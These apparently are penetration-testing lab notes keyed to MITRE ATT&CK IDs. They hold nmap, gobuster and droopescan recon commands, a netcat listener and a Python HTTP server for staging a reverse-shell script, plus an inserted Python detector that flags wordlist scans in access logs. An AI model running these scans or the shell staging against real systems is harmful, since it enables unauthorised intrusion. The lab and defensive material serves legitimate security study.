Network Service Discovery: T1046
echo "targetip" > target.txt
nmap -sC -sV -Pn -oA nmap -iL target.txt
Active Scanning: Wordlist Scanning: T1595.003
echo "10.129.129.* websitename.htb" | sudo tee -a /etc/hosts
gobuster vhost -w ~/Desktop/Useful\ Repos/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://website.htb
If you don't have SecLists installed:
git clone https://github.com/danielmiessler/SecLists.git
Note that on Pwnbox it's found on the Desktop.
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir --url http://website.htb -t 20
cd opt/droopescan
./droopescan scan drupal -u 10.129.147.*
http://10.129.147.*/CHANGELOG.txt
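Defender view of the gobuster dir scan above (added example, not part of the original notes): a wordlist scan shows up in the web server access log as one client requesting many distinct paths that mostly return 404, often with gobuster's default "gobuster/<version>" User-Agent. The log lines, addresses, version string and thresholds below are constructed for illustration.

```python
import re
from collections import defaultdict

def _line(ip, path, status, ua):
    # Build one constructed combined-log-format line (sample data only).
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 153 "-" "{ua}"'

# Constructed sample log: a default gobuster run, a scan with a changed
# User-Agent, a normal browser, and one malformed line.
SAMPLE_LOG = "\n".join(
    [_line("192.0.2.10", f"/{p}", 404, "gobuster/3.6") for p in ("admin", "backup", "config", "test", "old")]
    + [_line("192.0.2.10", "/login", 200, "gobuster/3.6")]
    + [_line("203.0.113.9", f"/{p}", 404, "curl/8.0") for p in ("a", "b", "c", "d", "e")]
    + [_line("198.51.100.5", p, s, "Mozilla/5.0") for p, s in (("/", 200), ("/index.html", 200), ("/favicon.ico", 404))]
    + ["garbage line that does not parse"]
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def detect_wordlist_scans(log_text, min_requests=5, min_404_ratio=0.8):
    """Return {client_ip: [reasons]} for clients that look like wordlist scanners."""
    stats = defaultdict(lambda: {"total": 0, "not_found": 0, "paths": set(), "uas": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        s = stats[m["ip"]]
        s["total"] += 1
        s["paths"].add(m["path"])
        s["uas"].add(m["ua"])
        if m["status"] == "404":
            s["not_found"] += 1
    findings = {}
    for ip, s in stats.items():
        reasons = []
        ratio = s["not_found"] / s["total"]
        # Many distinct paths, mostly missing: behaviour-based signal.
        if len(s["paths"]) >= min_requests and ratio >= min_404_ratio:
            reasons.append("high-404-ratio")
        # Default tool User-Agent: cheap signal, but trivially changed by the client.
        if any(ua.lower().startswith("gobuster/") for ua in s["uas"]):
            reasons.append("scanner-user-agent")
        if reasons:
            findings[ip] = reasons
    return findings
```

The second client is caught only by the 404 ratio, which is why the User-Agent match should not be the sole rule.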
Develop Capabilities: Malware: T1587.001
Simple shell script
ip addr
Change the IP to the IP address of your machine
vim shell.sh
Netcat listener
Open another terminal and run a Netcat listener
nc -nvlp 1337
Stage Capabilities: Upload Malware: T1608.001
Simple Python web server
To deliver our shell script, use a simple HTTP server
python3 -m http.server 8000
Drive-by Compromise: T1189
Burp Suite